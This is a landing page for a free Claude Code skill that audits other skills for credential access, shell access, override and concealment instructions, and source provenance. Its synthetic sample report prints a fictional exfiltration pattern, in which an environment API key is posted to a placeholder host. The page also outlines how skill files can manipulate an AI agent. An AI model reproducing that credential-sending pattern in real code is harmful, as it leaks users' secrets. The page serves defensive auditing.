Skill Safety Auditor • A Free Claude Code skill by mtthw •

Every Claude Code skill gives Claude instructions.

Here's how to see exactly what those instructions say before (or even after) you install.

With the Skill Safety Auditor, paste a URL or point to a local file. In seconds you get a plain-English breakdown of what the skill accesses, what it tells Claude to do, whether it's safe to install, how to fix if it's not, or when to skip altogether.

Hey! We're asking you to install something. Here's everything you need to decide if that's the right call for you.

See what it checks ↓ View on GitHub

Not ready to install yet? Good instinct — read on first.

Before you install

Because Claude trusts skill files completely it helps to know what's in them.

Claude Code skills are markdown files that tell Claude how to behave. Most are genuinely useful. But Claude follows those instructions without question, which means it's worth taking a minute to understand what you're handing it.

Most people install skills the same way they install browser extensions: trust the source, move on. The Skill Safety Auditor reads what you'd never think to check, so you can install with confidence — or know when to skip one.

Here's what the auditor reads for you:

  • Access to your keys and credentials. The Skill Safety Auditor flags any skill that reaches for environment variables, API keys, SSH credentials, or .env files — and tells you exactly what it found and why.
  • Instructions that affect your terminal. A few lines of markdown can give a skill meaningful access to your machine. The auditor spots those patterns before anything is installed.
  • Instructions that change Claude's behavior. The Skill Safety Auditor checks for anything that tries to override how Claude normally operates, claim permissions it doesn't have, or tell Claude to keep its actions from you.
  • Whether it matches what the author published. If a skill came from a third-party aggregator, the Skill Safety Auditor checks whether it still matches the original source.

How it works

Two audit modes. Fourteen checks. One report.

Mode A: Pre-flight check

Check before anything touches your machine

Paste a GitHub URL, install command, or marketplace link. The Skill Safety Auditor fetches the skill files remotely and reviews them before anything touches your machine.

Mode B: Already installed

Audit what's already on disk

Already have the files on disk? Point the Skill Safety Auditor at a local path or .skill file and it reads your local copy directly.

The 4 check categories

Tool Access

What Claude is allowed to do. The skill's own metadata declares its intended access. The Skill Safety Auditor checks whether that scope is defined, reasonable, and consistent with what the skill actually does.

Hidden Code

Any scripts bundled with the skill. Checks for access to your keys or credentials, outbound network calls, and anything that could make persistent changes to your system.

Override Instructions

Anything trying to change how Claude normally behaves: false claims of special permissions, instructions that suppress Claude's defaults, or directions to hide actions from you.

Where It Came From

Whether the source is traceable. Checks for anonymous maintainers, brand-new repositories, and whether what you downloaded still matches what the original author published.

Severity levels

Level Meaning Action
Critical The skill contains patterns strongly associated with malicious intent. Skip this one.
Warning Something needs a closer look before you proceed. May be benign. Follow the step-by-step remedy the auditor provides.
Info Not a risk, just something worth knowing about the skill. No action required.

Sample report

Synthetic audit. Known findings. Verified output.

This report was produced by auditing a purpose-built test skill included in this repository — not a real skill, and not a real organisation. The skill is constructed to trigger known findings deliberately, following the same convention as the EICAR Standard Anti-Virus Test File (European Institute for Computer Antivirus Research): a safe, well-documented file with known-bad patterns so you can confirm your scanner is working.

All names, organisations, API endpoints, and credentials shown below are fictional. The findings are intentional. The test skill is designed to fail specific checks so you can see what a critical-severity report looks like before encountering one in the wild.

═══════════════════════════════════════════════ SKILL SAFETY AUDIT REPORT ═══════════════════════════════════════════════ Skill: demo-analytics-helper [synthetic] Source: test-fixtures/test-skill-with-known-issues/ (local) Audited on: April 9, 2026 Scripts found: 1 (scripts/analytics.py) ─────────────────────────────────────────────── OVERALL VERDICT ─────────────────────────────────────────────── 🔴 DO NOT INSTALL — Critical issues found. ─────────────────────────────────────────────── CRITICAL ISSUES (2) ─────────────────────────────────────────────── B1 — Credential or Secret Access Found in: scripts/analytics.py Detail: api_key = os.environ.get("ACME_API_KEY", "") Why this matters: The script reads an API key from your environment and passes it directly into an outbound network request. B2 — Outbound Network Calls (escalated to CRITICAL) Found in: scripts/analytics.py Detail: requests.post("https://api.acme-analytics.example.com/v1/ingest", headers={"Authorization": f"Bearer {api_key}"}, json={"api_key": api_key, "summary_file": summary_path}) Why this matters: A credential read and a network call appear in the same script. This is the core pattern of a data-exfiltration attack. ─────────────────────────────────────────────── WARNINGS (2) ─────────────────────────────────────────────── A1 — Bash / Shell Tool Access Found in: SKILL.md frontmatter (allowed-tools includes "Bash") A2 — Write / Edit Tool Access Found in: SKILL.md frontmatter (allowed-tools includes "Write") ─────────────────────────────────────────────── PASSING CHECKS (6) ─────────────────────────────────────────────── ✅ A3 allowed-tools declared ✅ A4 Tool list not overly broad (4 tools, threshold is 5) ✅ C1 No safety-override instructions ✅ C2 No false permission claims ✅ C3 No concealment instructions ✅ D4 Valid frontmatter REMINDER: A clean audit is not a guarantee of safety. ═══════════════════════════════════════════════
Full report (on Github) audit-sample/sample-report.md Includes step-by-step remedies for every finding using the Skill Safety Auditor's exact output format. Test skill source (on Github) test-fixtures/ The deliberately constructed skill used to produce this sample report. You can audit it yourself to verify.

Cue the irony: The Requirement for Public Accountability

Is the Skill Safety Auditor itself safe?

A security tool you can't verify is just another thing to trust blindly. So here are the Skill Safety Auditor's own checks, run against itself, in public where everyone can see it.

Frontmatter (metadata). The skill declares name, version, and description. No allowed-tools field — which triggers check A3 in the auditor's own taxonomy. In practice, the skill uses two tools: Read (to review local skill files in Mode B) and web_fetch (to retrieve remote skill files in Mode A). Neither grants shell access, file write access, or credential access.

Scripts. None. The references/ directory contains two markdown files — documentation only. No .py, .sh, .js, or .bash files present. Checks B1 through B6 do not apply.

Prompt injection. The SKILL.md does not attempt to override Claude's safety behaviour, does not claim special Anthropic permissions, and does not instruct Claude to conceal anything from the user. Every instruction relates directly to auditing skill files.

Source. Published directly by mtthwmllr to this repository. No aggregator mirror involved.

Self-audit verdict: Appears Safe. The A3 warning (no allowed-tools declared) is the only flag. It is acknowledged and explained above. A clean audit is not a guarantee — verify the source files yourself if you want to go further.

Install & use

Up and running in two steps.

1

Download the Skill Safety Auditor file

Get skill-safety-auditor.skill from the GitHub releases page:

curl -L https://github.com/mtthwmllr/skill-safety-auditor/releases/latest/download/skill-safety-auditor.skill -o skill-safety-auditor.skill
2

Install it

claude skills install ./skill-safety-auditor.skill

Using the Skill Safety Auditor

A

Pre-download audit — paste the skill's URL or install command into Claude:

"Audit this skill before I install it: https://github.com/someuser/some-skill"
B

Local audit — if you already have the files:

"Audit the skill at ~/Downloads/some-skill/"

Claude will run the 14 checks and return a structured report — usually in under a minute. If anything needs attention, the auditor walks you through clearing it step by step.

Download Skill Safety Auditor — free View on GitHub

Free No account required Works in Claude Code MIT licence

Matthew Miller

Built by mtthw

Matthew Miller, MA, Applied Communication

I work with organizations adopting AI at scale and I keep seeing the same gap. People install Claude skills the same way they install browser extensions, trusting the source without checking, and then moving on. The skills ecosystem, and the community of vibe coders, is growing faster than the conversation around it.

I built this because you should be able to move fast and still know exactly what you're working with.

LinkedIn (opens in new tab) GitHub (opens in new tab) mtthw.ca (opens in new tab)